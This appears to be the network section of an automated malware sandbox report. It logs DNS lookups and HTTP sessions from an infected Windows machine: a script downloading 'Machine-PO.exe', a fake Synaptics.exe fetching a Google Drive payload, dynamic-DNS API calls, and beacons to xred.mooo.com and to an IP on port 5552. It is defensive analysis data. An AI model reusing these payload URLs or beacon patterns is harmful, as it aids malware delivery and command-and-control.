                                                                                                                                                                            Dec 30, 2024 11:49:47.398703098 CET49905443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:47.439336061 CET44349905142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:47.487668037 CET44349906142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:47.487749100 CET49906443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:47.488426924 CET44349906142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:47.488506079 CET49906443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:47.490259886 CET49906443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:47.490267992 CET44349906142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:47.490505934 CET44349906142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.019974947 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.019980907 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.020041943 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.020056963 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.020076036 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.021820068 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.021833897 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.022490025 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.022501945 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.023403883 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.023447037 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.025141001 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.025723934 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.025741100 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.364088058 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.364156008 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.371149063 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.371212959 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.640633106 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.640710115 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.653101921 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.653290033 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.011029959 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.011065960 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012171984 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.012203932 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012574911 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.012582064 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012999058 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013011932 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013150930 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013161898 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013341904 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013346910 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.013348103 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013358116 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.017312050 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.017323971 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296185017 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296263933 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296291113 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296324968 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296838999 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296947956 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296952009 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296993017 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.334114075 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334167004 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334219933 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.334250927 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334275961 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334296942 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.334326029 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.402703047 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.402776003 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.402797937 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.402961016 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.403655052 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.403744936 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.403779984 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.403827906 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.497447968 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497498989 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497513056 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.497564077 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497586966 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.497611046 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.498650074 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498707056 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.498714924 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498730898 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498775005 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:58.562264919 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:58.698951960 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:50:09.515161991 CET4975580192.168.2.869.42.215.252
                                                                                                                                                                            Dec 30, 2024 11:50:09.517601013 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:50:09.517633915 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:50:09.517678976 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:50:09.517709970 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:50:36.168809891 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:50:36.217515945 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 30, 2024 11:48:40.090106964 CET5687953192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:40.130081892 CET53568791.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:54.562416077 CET5105253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:54.569535017 CET53510521.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:55.448858023 CET5205253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:55.455827951 CET53520521.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:55.492980003 CET6273153192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:55.500417948 CET53627311.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:56.149596930 CET5980053192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:56.156956911 CET53598001.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:14.617022991 CET5897753192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:14.624532938 CET53589771.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.244957924 CET6462253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:21.252144098 CET53646221.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:25.779290915 CET5251153192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:25.786860943 CET53525111.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:31.721139908 CET6477353192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:31.728669882 CET53647731.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.514108896 CET5649253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:38.520757914 CET53564921.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.482752085 CET5786953192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:45.489841938 CET53578691.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012824059 CET4952653192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:57.020544052 CET53495261.1.1.1192.168.2.8
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 30, 2024 11:48:40.090106964 CET | 192.168.2.8 | 1.1.1.1 | 0xde57 | Standard query (0) | filedn.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:48:54.562416077 CET | 192.168.2.8 | 1.1.1.1 | 0x2b9e | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:48:55.448858023 CET | 192.168.2.8 | 1.1.1.1 | 0xd102 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:48:55.492980003 CET | 192.168.2.8 | 1.1.1.1 | 0xc22a | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:48:56.149596930 CET | 192.168.2.8 | 1.1.1.1 | 0xca29 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:14.617022991 CET | 192.168.2.8 | 1.1.1.1 | 0x14bb | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:21.244957924 CET | 192.168.2.8 | 1.1.1.1 | 0x9277 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:25.779290915 CET | 192.168.2.8 | 1.1.1.1 | 0x541e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:31.721139908 CET | 192.168.2.8 | 1.1.1.1 | 0xb6d8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:38.514108896 CET | 192.168.2.8 | 1.1.1.1 | 0x3613 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:45.482752085 CET | 192.168.2.8 | 1.1.1.1 | 0x9e83 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
| Dec 30, 2024 11:49:57.012824059 CET | 192.168.2.8 | 1.1.1.1 | 0x812a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:48:40.130081892 CET | 1.1.1.1 | 192.168.2.8 | 0xde57 | No error (0) | filedn.com |  | 23.109.93.100 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:54.569535017 CET | 1.1.1.1 | 192.168.2.8 | 0x2b9e | No error (0) | docs.google.com |  | 142.250.185.78 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:55.455827951 CET | 1.1.1.1 | 192.168.2.8 | 0xd102 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:55.500417948 CET | 1.1.1.1 | 192.168.2.8 | 0xc22a | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:56.156956911 CET | 1.1.1.1 | 192.168.2.8 | 0xca29 | No error (0) | drive.usercontent.google.com |  | 142.250.185.161 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:14.624532938 CET | 1.1.1.1 | 192.168.2.8 | 0x14bb | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:21.252144098 CET | 1.1.1.1 | 192.168.2.8 | 0x9277 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:25.786860943 CET | 1.1.1.1 | 192.168.2.8 | 0x541e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:31.728669882 CET | 1.1.1.1 | 192.168.2.8 | 0xb6d8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:38.520757914 CET | 1.1.1.1 | 192.168.2.8 | 0x3613 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:45.489841938 CET | 1.1.1.1 | 192.168.2.8 | 0x9e83 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:56.287873983 CET | 1.1.1.1 | 192.168.2.8 | 0xf066 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:49:56.287873983 CET | 1.1.1.1 | 192.168.2.8 | 0xf066 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:57.020544052 CET | 1.1.1.1 | 192.168.2.8 | 0x812a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                            • filedn.com
                                                                                                                                                                            • docs.google.com
                                                                                                                                                                            • drive.usercontent.google.com
                                                                                                                                                                            • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49718 | 69.42.215.252 | 80 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:48:55.506304979 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                            User-Agent: MyApp
                                                                                                                                                                            Host: freedns.afraid.org
                                                                                                                                                                            Cache-Control: no-cache
Dec 30, 2024 11:48:56.102370977 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:56 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49755 | 69.42.215.252 | 80 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:49:14.634390116 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                            User-Agent: MyApp
                                                                                                                                                                            Host: freedns.afraid.org
                                                                                                                                                                            Cache-Control: no-cache
Dec 30, 2024 11:49:15.382493973 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 23.109.93.100 | 443 | 7732 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:40 UTC | 352 | OUT | GET /lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Language: en-ch
                                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: filedn.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-30 10:48:41 UTC | 348 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: CacheHTTPd v1.0
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:41 +0000
                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                            Content-Length: 2208256
                                                                                                                                                                            Etag: "eca8537e95f4b81f60d573f450faac9684a1d910"
                                                                                                                                                                            Expires: Mon, 30 Dec 2024 16:48:41 +0000
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Transfer-Encoding: binary
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:55 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
2024-12-30 10:48:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:55 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-sJUKz-CGALDKxOe6862OgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            2 | 192.168.2.8 | 49715 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:48:55 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:55 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-k9l1oR496jW67Im9jn18Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            3 | 192.168.2.8 | 49721 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:48:56 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-7rJ7VLoaIiIHOkuRTlJWsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            4 | 192.168.2.8 | 49722 | 142.250.185.78 | 443 | 8060 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:48:56 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8WcOyBUvcUC2op02lGvZvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
